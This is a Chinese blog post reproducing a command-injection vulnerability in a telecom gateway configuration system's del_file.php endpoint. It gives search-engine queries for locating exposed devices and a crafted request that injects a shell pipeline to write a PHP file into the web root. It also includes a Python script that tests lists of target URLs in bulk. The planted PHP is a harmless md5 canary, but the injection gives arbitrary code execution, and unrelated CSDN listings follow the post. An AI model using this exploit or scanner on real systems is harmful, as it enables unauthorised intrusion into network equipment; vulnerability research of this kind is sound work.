【漏洞复现】电信网关配置管理系统——del_file——命令执行

已于 2024-07-09 10:08:47 修改
阅读量548 收藏 10
点赞数 11
分类专栏: 漏洞复现 文章标签: 渗透测试
于 2024-06-28 13:29:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/140040660
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

电信网关配置管理系统是一个用于管理和配置电信网关设备的软件系统。其del_file接口存在命令执行漏洞。

漏洞复现

1)信息收集
fofa:body="a:link{text-decoration:none;color:orange;}"
fofa:body="img/login_bg3.png" && body="系统登录"
hunter:web.body="a:link{text-decoration:none;color:orange;}"
在这里插入图片描述

愿世间美好与你欢欢相扣~

在这里插入图片描述
2)构造数据包

GET /manager/newtpl/del_file.php?file=1.txt%7Cecho%20PD9waHAgZWNobyBtZDUoJzEyMzQ1NicpO3VubGluayhfX0ZJTEVfXyk7Pz4%3D%20%7C%20base64%20-d%20%3E%20404.php HTTP/1.1
Host: ip

代码解释:

  1. 读取名为 “1.txt” 的文件。
  2. 输出 “PD9waHAgZWNobyBtZDUoJzEyMzQ1NicpO3VubGluayhfX0ZJTEVfXyk7Pz4=” 的内容。
  3. 将上述内容进行base64解码。
  4. 解码后:<?php echo md5('123456');unlink(__FILE__);?>
  5. 将解码后的内容写入名为 “404.php” 的文件。
<?php 
echo md5('123456');
unlink(__FILE__);
?>
  1. 使用md5函数生成字符串’123456’的MD5散列值,并使用echo语句输出这个值。
  2. 使用unlink函数删除当前执行的PHP文件。
  3. __FILE__是一个魔术常量,它返回当前文件的完整路径。
  4. 执行结果:打印123456MD5并删除自身文件。

3)抓包放包
在这里插入图片描述
4)查看404.php文件

GET /manager/newtpl/404.php HTTP/1.1
Host:ip

在这里插入图片描述
回显包含123456的MD5,命令被执行了

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests  # 导入requests库,用于发送HTTP请求
import random  # 导入random库,用于生成随机字符串
import string  # 导入string库,用于获取字符串常量
import argparse  # 导入argparse库,用于解析命令行参数
from urllib3.exceptions import InsecureRequestWarning  # 导入urllib3库中的警告异常

# 定义颜色代码,用于在终端中显示红色文本
RED = '\033[91m'
RESET = '\033[0m'

# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 定义一个函数,用于生成指定长度的随机字符串
def rand_base(n):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))

# 定义一个函数,用于检查指定URL是否存在漏洞
def check_vulnerability(url):
    filename = rand_base(6)  # 生成一个随机的6位字符串作为文件名
    # 构造第一个请求的URL,尝试注入恶意代码生成PHP文件
    inject_url = url.rstrip('/') + f'/manager/newtpl/del_file.php?file=1.txt%7Cecho%20PD9waHAgZWNobyBtZDUoJzEyMzQ1NicpO3VubGluayhfX0ZJTEVfXyk7Pz4%3D%20%7C%20base64%20-d%20%3E%20{filename}.php'
    try:
        response_inject = requests.get(inject_url, verify=False, timeout=30)  # 发送请求,不验证SSL证书,超时时间30秒

        # 构造第二个请求的URL,尝试访问生成的PHP文件
        access_url = url.rstrip('/') + f'/manager/newtpl/{filename}.php'
        response_access = requests.get(access_url, verify=False, timeout=30)  # 发送请求

        # 根据响应判断是否存在漏洞
        if response_inject.status_code == 200 and response_access.status_code == 200 and "e10adc3949ba59abbe56e057f20f883e" in response_access.text:
            print(f"{RED}URL [{url}] 存在电信网关配置管理系统 del_file.php 命令执行漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    except requests.exceptions.Timeout:
        print(f"URL [{url}] 请求超时,可能存在漏洞")
    except requests.RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

# 定义主函数,用于解析命令行参数并调用check_vulnerability函数
def main():
    parser = argparse.ArgumentParser(description='检测目标地址是否存在电信网关配置管理系统 del_file.php 命令执行漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    if args.url:  # 如果指定了URL
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url  # 确保URL以http或https开头
        check_vulnerability(args.url)
    elif args.file:  # 如果指定了文件
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()  # 读取文件中的URL列表
            for url in urls:
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url  # 确保URL以http或https开头
                check_vulnerability(url)

# 程序入口点
if __name__ == '__main__':
    main()

运行截图:
在这里插入图片描述

Long._.L
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Ruijie-UAC-online_check-rce
知黑而守白
03-07 125
锐捷统一上网行为管理与审计RG-UAC是锐捷网络自主研发的业界领先的上网行为管理与审计产品,以路由、透明或混合模式部署在网络的关键节点上,对数据进行2-7层的全面检查和分析,深度识别、管控和审计数百种IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频应用等常见应用,并利用智能流控、智能阻断、智能路由、智能DNS策略等技术提供强大的带宽管理特性,配合创新的社交网络行为精细化管理功能、清晰易管理日志等功能,同时具备了最精细的用户上网行为的审计功能,提供了业界最全面、完善的上网行为管理解决方案。
电信网关配置管理系统 del_file.php 前台RCE漏洞复现
0xSec
06-14 710
电信网关配置管理系统/manager/newtpl/del_file.php 接口存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意代码,从而获取服务器权限。
驱动注册的两种方式(一)——file_operations结构体
甜不啦啦啦的博客
11-24 3083
#include //module_init() & module_exit() #include //__init() & __exit() #include #include //module_init() & module_exit() #include //__init __exit #include //register_chrdev() & unre
深挖python上下文管理——类的__init__、__enter__、__exit__、__del__在with下的表现
Rainy Chan
09-27 3587
场景:今天因为需要测试一个服务,在测试前,需要把它依赖的服务干掉,在测试完成后(不论报错),再把服务起来。 因为它是其中的一个步骤,其他时间服务需开启,不适用unittest通用的setup和teardown 所以想到写一个类,通过上下文来管理服务状态。 这是第一段测试代码 # coding: utf-8 class C: def __init__(self): print...
Linux中的网络管理——网络配置命令
热门推荐
梦空间
11-01 8万+
目录目录 Linux网络配置 ifconfig命令 Linux网络配置文件 网卡信息文件 主机名文件 DNS配置文件 VMWare中Linux的网络参数配置 VMWare桥接模式下配置静态IP Linux网络命令 网络环境操作 网络测试命令Linux网络配置  在Linux中配置IP地址的方法有以下这么几种: 图形界面配置IP地址(操作方式如Windows系统配置IP,但在实际生产中,我们并不建议在
【Linux】一步一步学Linux——ctrlaltdel命令(198)
C/C++软件工程师、嵌入式软件工程师、物联网研发工程师、C/C++讲师、物联网讲师、嵌入式讲师---欢迎大家一起交流(私信添加博主微信)
08-29 2745
00. 目录 文章目录00. 目录01. 命令概述02. 命令格式03. 常用选项04. 参考示例05. 附录 01. 命令概述 ctrlaltdel命令用来设置组合键“Ctrl+Alt+Del”的功能。 02. 命令格式 格式: ctrlaltdel <hard|soft> 03. 常用选项 选项: -h, --help 显示此帮助并退出 -V, --version ...
Python代码优化工具——memory_profiler
太阳爱编程
08-31 7300
简要介绍Python的memory_profiler库
CMD目录操作——del【删除普通文件】和rd命令【删除非空文件夹】
HWP
04-20 3741
删除许多文件: 1,通过cd切换到想要到的文件夹地址 2,执行下面的命令del *.* 删除空文件夹以及非空文件夹: 参数: rd /s/q 文件夹的名字 /s 删除指定目录和所有子目录及其包含的所有文件 /q 安静模式。删除目录时,不会提示确认信息 /? 显示该命令的帮助信息 ...
Python——学生管理系统(面向对象)
Cantevenl的博客
04-05 1万+
学生管理系统(面向对象)前言file_manager.pytools.pymodel.pyindex.pymanagerSystem.py执行效果 前言 这个只是使用面向对象的方法写的 构思和学生管理系统(JSON模块)是一样的 file_manager.py """ Project: ClassStudent Creator: 猫猫 Create time: 2021-03-04 08:18 IDE: PyCharm Introduction:https://blog.csdn.net/Canteven
del+sql.rar_DelPhi SQl_sql_学籍管理系统_学籍管理系统 sql
09-24
标题中的"del+sql.rar_DelPhi SQl_sql_学籍管理系统_学籍管理系统 sql"表明这是一个关于使用Delphi编程语言结合SQL数据库技术开发的学籍管理系统项目。Delphi是一种强大的对象 Pascal 编程工具,常用于构建桌面应用...
操作系统课设——文件管理系统
09-27
1.简单的操作系统构建,完成伪多进程过程 cd、dir、mkdir,more,copy,rmdir,find,copy,del,xcopy,exit 2 另外,需要支持从本地磁盘复制内容到虚拟的磁盘驱动器中,也支持从虚拟的磁盘驱动器复制内容到本地磁盘...
del_file_block_before_date.rar_Before
09-19
标题“del_file_block_before_date.rar_Before”暗示了一个与文件管理相关的操作,特别是涉及删除旧文件的场景。这个操作可能是一个脚本或程序,用于自动清理特定目录下超过某一时间点的文件。在这个过程中,"Before...
C语言课程设计——学生成绩管理系统.zip
10-01
C语言课程设计——学生成绩管理系统: struct student/*定义学生成绩结构体*/ { int num;/*学号*/ char name[15];/*姓名*/ double elec;/*选修课*/ double expe;/*实验课*/ double requ;/*必修课*/ double sum;...
dos-shell.zip_cmd执行命令_dos shell 编程_远程DOS_远程执行 cmd
09-21
总的来说,掌握"dos-shell.zip_cmd执行命令"、"dos shell编程"、"远程DOS"和"远程执行cmd"的知识点,对于IT专业人员来说至关重要,它能帮助你更高效地管理系统执行远程任务,解决网络问题,甚至在安全的环境中实现...
简约清新PPT模板,适用于工作总结,工作计划
07-15
【作品名称】:简约清新PPT模板,适用于工作总结,工作计划 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Android中SQLite使用方法.docx
最新发布
07-15
数据库
存储图片到SQL-SERVER数据库中.doc
07-15
数据库
【精美排版】sql数据库基础面试题复习题测验题全.docx
07-15
数据库
route del 网关_如何使用 route 命令配置网络出口?
06-06
route 命令可以用来配置网络出口,其中 "route add" 命令用于添加路由,"route delete" 命令用于删除路由。以下是使用 "route add" 和 "route delete" 命令配置网络出口的步骤: 1. 查看网络出口信息:可以使用 "ipconfig" 命令或 "ifconfig" 命令来查看网络出口的 IP 地址和网关。 2. 添加路由:可以使用以下命令添加路由: ``` route add <目标网络地址> mask <子网掩码> <网关地址> ``` 其中,<目标网络地址> 是需要访问的网络地址,<子网掩码> 是目标网络地址的子网掩码,<网关地址> 是要绕过的网关地址。 3. 删除路由:可以使用以下命令删除路由: ``` route delete <目标网络地址> ``` 其中,<目标网络地址> 是需要删除的路由的目标网络地址。 需要注意的是,route 命令只能在命令行窗口中使用,并需要管理员权限。另外,添加的路由只在当前会话中有效,重启计算机后需要重新添加。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值